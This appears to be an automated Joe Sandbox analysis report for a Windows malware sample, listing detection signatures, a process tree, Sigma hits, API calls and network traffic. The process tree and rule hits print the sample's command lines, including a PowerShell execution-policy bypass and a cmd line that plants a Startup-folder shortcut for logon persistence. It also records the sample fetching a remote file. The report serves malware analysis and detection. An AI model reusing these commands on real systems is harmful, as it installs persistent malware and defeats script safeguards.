Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528956
MD5:1d2cf62e7874bb460b7258279a55ddf3
SHA1:9a060f273aee924d7972a5ddd561a34f4510d64d
SHA256:c5378718434462185d98c672106dbfd4efbc8d6b7a0c60efe79000f11c955ffa
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1D2CF62E7874BB460B7258279A55DDF3)
    • powershell.exe (PID: 7452 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • InformationCheck.exe (PID: 7680 cmdline: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • cmd.exe (PID: 7724 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7856 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 7948 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: C56B5F0201A3B3DE53E561FE76912BFD)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 , CommandLine: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\InformationCheck.exe, NewProcessName: C:\Users\Public\InformationCheck.exe, OriginalFileName: C:\Users\Public\InformationCheck.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 , ProcessId: 7680, ProcessName: InformationCheck.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7432, ParentProcessName: file.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ProcessId: 7452, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 , ParentImage: C:\Users\Public\InformationCheck.exe, ParentProcessId: 7680, ParentProcessName: InformationCheck.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7724, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7432, ParentProcessName: file.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ProcessId: 7452, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7856, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\Public\Details.au3
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7432, ParentProcessName: file.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ProcessId: 7452, ProcessName: powershell.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7856, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 7948, ProcessName: SwiftWrite.pif
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7856, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7432, ParentProcessName: file.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ProcessId: 7452, ProcessName: powershell.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7724, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: file.exeReversingLabs: Detection: 31%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: file.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7978AB7C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF7978B72A8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B71F4 FindFirstFileW,FindClose,0_2_00007FF7978B71F4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7978ABC70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF7978BA874
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF7978AC7C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7978BA4F8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF7978B6428
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7978BA350
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797872F50 FindFirstFileExW,0_2_00007FF797872F50
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_004C4005
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose,3_2_004C494A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_004CC2FF
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CCD14 FindFirstFileW,FindClose,3_2_004CCD14
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004CCD9F
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_004CF5D8
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_004CF735
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_004CFA36
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_004C3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00F84005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8494A GetFileAttributesW,FindFirstFileW,FindClose,8_2_00F8494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_00F8C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_00F8CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8CD14 FindFirstFileW,FindClose,8_2_00F8CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00F8F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00F8F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_00F8FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00F83CE2
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /v1/ws2/:updatemake/:reality/reality.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: my.cloudme.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978BE87C InternetReadFile,0_2_00007FF7978BE87C
Source: global trafficHTTP traffic detected: GET /v1/ws2/:updatemake/:reality/reality.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: my.cloudme.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: my.cloudme.com
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1809510030.000001C71DC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2033706127.000001C734A92000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2950931190.0000000000529000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2021600603.000001C73479E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co-
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.cloH
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.cloudme.com/v1/ws2/:updatemake/:reality/reality.txt
Source: powershell.exe, 00000001.00000002.1809510030.000001C71DC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF7978C0D24
